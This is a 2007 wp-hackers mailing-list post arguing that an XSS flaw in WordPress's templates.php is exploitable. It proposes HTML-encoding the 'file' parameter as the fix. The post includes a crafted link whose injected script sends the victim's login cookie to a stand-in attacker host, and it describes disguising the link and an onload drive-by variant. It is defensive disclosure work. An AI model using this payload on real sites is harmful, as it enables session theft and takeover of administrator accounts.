[wp-hackers] Reputed XSS issue with WordPress (templates.php)

Bas Bosman wordpress at nazgul.nu
Tue Feb 13 18:14:02 GMT 2007


> On 2/13/07, Alex Günsche <ag.ml2007 at zirona.com> wrote:
>> On Tue, 2007-02-13 at 17:44 +0100, Bas Bosman wrote:
>> > This can be triggered by users without the edit files capability. You
>> just
>> > have to trick somebody with that capability to click that specially
>> > crafted link, by mailing a link or posting it in a comment for
>> instance.
>>
>> Maybe so, but doesn't this fall into the "social engineering" category?
>>
>> With the same arguments, you could say that other managing actions which
>> are triggered by a GET request are vulnerable to XSS attacks.
>
> We protect this with a nonce and an AYS.  There's nothing more we can do.

If I can get you to click this link I have your WordPress login cookie,
giving me admin (if you're admin ofcourse) on your blog, without AYS
and/or nonce saving you:
<a
href="http://victim.com/blog/wp-admin/templates.php?action=update&file=<script>document.location.href%3d'http://evilhacker.com/grab.php%3fb='%2bescape(document.cookie);</script>&submit=Update+File+%C2%BB">Google</a>

I then code a grab.php which saves that info and redirects you to a safe
page (For example google if the user was thinking he clicked a google
link) and you wouldn't even know your cookies are mine.

We should htmlencode the file parameter from the querystring before it's
being used as raw output to the client again to fix this.

Regards,
Bas Bosman (Nazgul)

P.S. If you think nobody clicks that link, what about a safe looking link
to my site, where this code gets executed onload. Again most people
wouldn't notice. This attack is even worse, because I can take the
referrer and try some frequent Wordpress install locations on that server,
thus making this attack work on more people instead of one.




More information about the wp-hackers mailing list